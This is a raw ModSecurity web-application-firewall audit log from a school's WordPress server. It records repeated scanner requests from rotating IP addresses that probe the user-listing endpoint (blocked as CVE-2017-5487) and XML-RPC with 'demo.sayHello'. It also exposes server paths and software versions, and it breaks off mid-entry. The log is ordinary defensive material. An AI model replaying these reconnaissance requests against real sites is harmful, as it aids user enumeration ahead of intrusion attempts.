--8e8b5c42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e8b5c42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805185083313 4593 (- - -) Stopwatch2: 1746805185083313 4593; combined=3598, p1=416, p2=2987, p3=21, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e8b5c42-Z-- --7c9b7b79-A-- [09/May/2025:22:39:46 +0700] aB4hwloC-7ITMWTA_c9eigAAAM0 103.236.140.4 56948 103.236.140.4 8181 --7c9b7b79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c9b7b79-C-- demo.sayHello --7c9b7b79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c9b7b79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805186664286 6613 (- - -) Stopwatch2: 1746805186664286 6613; combined=4784, p1=608, p2=3931, p3=42, p4=41, p5=96, sr=89, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c9b7b79-Z-- --d92e4a6f-A-- [09/May/2025:22:40:43 +0700] aB4h-1oC-7ITMWTA_c9ejgAAAMY 103.236.140.4 56956 103.236.140.4 8181 --d92e4a6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d92e4a6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d92e4a6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805243202988 2921 (- - -) Stopwatch2: 1746805243202988 2921; combined=1304, p1=466, p2=808, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d92e4a6f-Z-- --dba26878-A-- [09/May/2025:22:40:49 +0700] aB4iAVoC-7ITMWTA_c9ekQAAAMw 103.236.140.4 56962 103.236.140.4 8181 --dba26878-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dba26878-C-- demo.sayHello --dba26878-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dba26878-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805249935340 5658 (- - -) Stopwatch2: 1746805249935340 5658; combined=4169, p1=502, p2=3516, p3=21, p4=22, p5=63, sr=74, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dba26878-Z-- --26fdf601-A-- [09/May/2025:22:42:06 +0700] aB4iTlqQ1nOVx9fWpZSxcQAAAAk 103.236.140.4 56986 103.236.140.4 8181 --26fdf601-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --26fdf601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26fdf601-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805326258586 3467 (- - -) Stopwatch2: 1746805326258586 3467; combined=1419, p1=465, p2=923, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26fdf601-Z-- --0c24fb0c-A-- [09/May/2025:22:42:12 +0700] aB4iVFoC-7ITMWTA_c9emQAAANU 103.236.140.4 56990 103.236.140.4 8181 --0c24fb0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c24fb0c-C-- demo.sayHello --0c24fb0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c24fb0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805332472952 6149 (- - -) Stopwatch2: 1746805332472952 6149; combined=4579, p1=595, p2=3697, p3=32, p4=34, p5=130, sr=100, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c24fb0c-Z-- --b1f03f0c-A-- [09/May/2025:22:43:17 +0700] aB4ilVoC-7ITMWTA_c9enwAAAMQ 103.236.140.4 57004 103.236.140.4 8181 --b1f03f0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1f03f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1f03f0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805397177169 2990 (- - -) Stopwatch2: 1746805397177169 2990; combined=1343, p1=459, p2=854, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1f03f0c-Z-- --e7417313-A-- [09/May/2025:22:43:24 +0700] aB4inFoC-7ITMWTA_c9eogAAAM4 103.236.140.4 57010 103.236.140.4 8181 --e7417313-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.175.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.175.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e7417313-C-- demo.sayHello --e7417313-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7417313-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805404546266 5000 (- - -) Stopwatch2: 1746805404546266 5000; combined=3791, p1=425, p2=3161, p3=20, p4=24, p5=93, sr=69, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7417313-Z-- --24ac804c-A-- [09/May/2025:22:44:59 +0700] aB4i-1oC-7ITMWTA_c9eqQAAAMk 103.236.140.4 57030 103.236.140.4 8181 --24ac804c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --24ac804c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24ac804c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805499474658 2240 (- - -) Stopwatch2: 1746805499474658 2240; combined=969, p1=321, p2=629, p3=0, p4=0, p5=19, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24ac804c-Z-- --6d43e435-A-- [09/May/2025:22:45:04 +0700] aB4jAFoC-7ITMWTA_c9erAAAAMw 103.236.140.4 57038 103.236.140.4 8181 --6d43e435-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6d43e435-C-- demo.sayHello --6d43e435-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d43e435-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805504520964 5850 (- - -) Stopwatch2: 1746805504520964 5850; combined=4313, p1=615, p2=3430, p3=33, p4=34, p5=119, sr=127, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d43e435-Z-- --ee056610-A-- [09/May/2025:22:48:58 +0700] aB4j6loC-7ITMWTA_c9eugAAAMI 103.236.140.4 57080 103.236.140.4 8181 --ee056610-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ee056610-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee056610-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805738076825 3182 (- - -) Stopwatch2: 1746805738076825 3182; combined=1402, p1=522, p2=849, p3=0, p4=0, p5=30, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee056610-Z-- --f28b7562-A-- [09/May/2025:22:49:06 +0700] aB4j8loC-7ITMWTA_c9euwAAAMQ 103.236.140.4 57084 103.236.140.4 8181 --f28b7562-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.78.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.78.156 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f28b7562-C-- demo.sayHello --f28b7562-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f28b7562-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805746139052 6114 (- - -) Stopwatch2: 1746805746139052 6114; combined=4494, p1=592, p2=3670, p3=34, p4=36, p5=97, sr=78, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f28b7562-Z-- --bbaa375b-A-- [09/May/2025:23:13:39 +0700] aB4ps1oC-7ITMWTA_c9fCgAAANM 103.236.140.4 57344 103.236.140.4 8181 --bbaa375b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bbaa375b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbaa375b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807219750774 2516 (- - -) Stopwatch2: 1746807219750774 2516; combined=1325, p1=409, p2=887, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbaa375b-Z-- --76afe201-A-- [09/May/2025:23:13:44 +0700] aB4puFoC-7ITMWTA_c9fDAAAAM8 103.236.140.4 57350 103.236.140.4 8181 --76afe201-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76afe201-C-- demo.sayHello --76afe201-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76afe201-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807224458395 3647 (- - -) Stopwatch2: 1746807224458395 3647; combined=2809, p1=353, p2=2301, p3=20, p4=20, p5=68, sr=53, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76afe201-Z-- --829f031e-A-- [09/May/2025:23:14:19 +0700] aB4p21oC-7ITMWTA_c9fEQAAANE 103.236.140.4 57362 103.236.140.4 8181 --829f031e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --829f031e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --829f031e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807259626381 2959 (- - -) Stopwatch2: 1746807259626381 2959; combined=1304, p1=457, p2=817, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --829f031e-Z-- --0ecc0435-A-- [09/May/2025:23:14:24 +0700] aB4p4C-fAO47ojYKsMr6DAAAAE8 103.236.140.4 57366 103.236.140.4 8181 --0ecc0435-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.149 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0ecc0435-C-- demo.sayHello --0ecc0435-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ecc0435-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746807264207227 5157 (- - -) Stopwatch2: 1746807264207227 5157; combined=3833, p1=462, p2=3160, p3=22, p4=25, p5=95, sr=69, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ecc0435-Z-- --809bff6e-A-- [09/May/2025:23:14:58 +0700] aB4qAh6q_ZMebht3q14k_gAAAIE 103.236.140.4 57376 103.236.140.4 8181 --809bff6e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --809bff6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --809bff6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746807298448953 2608 (- - -) Stopwatch2: 1746807298448953 2608; combined=1189, p1=431, p2=729, p3=0, p4=0, p5=29, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --809bff6e-Z-- --b6931c18-A-- [09/May/2025:23:15:03 +0700] aB4qB1oC-7ITMWTA_c9fFwAAAME 103.236.140.4 57380 103.236.140.4 8181 --b6931c18-B-- POST /xmlrpc.php HTTP/1.0 Host: 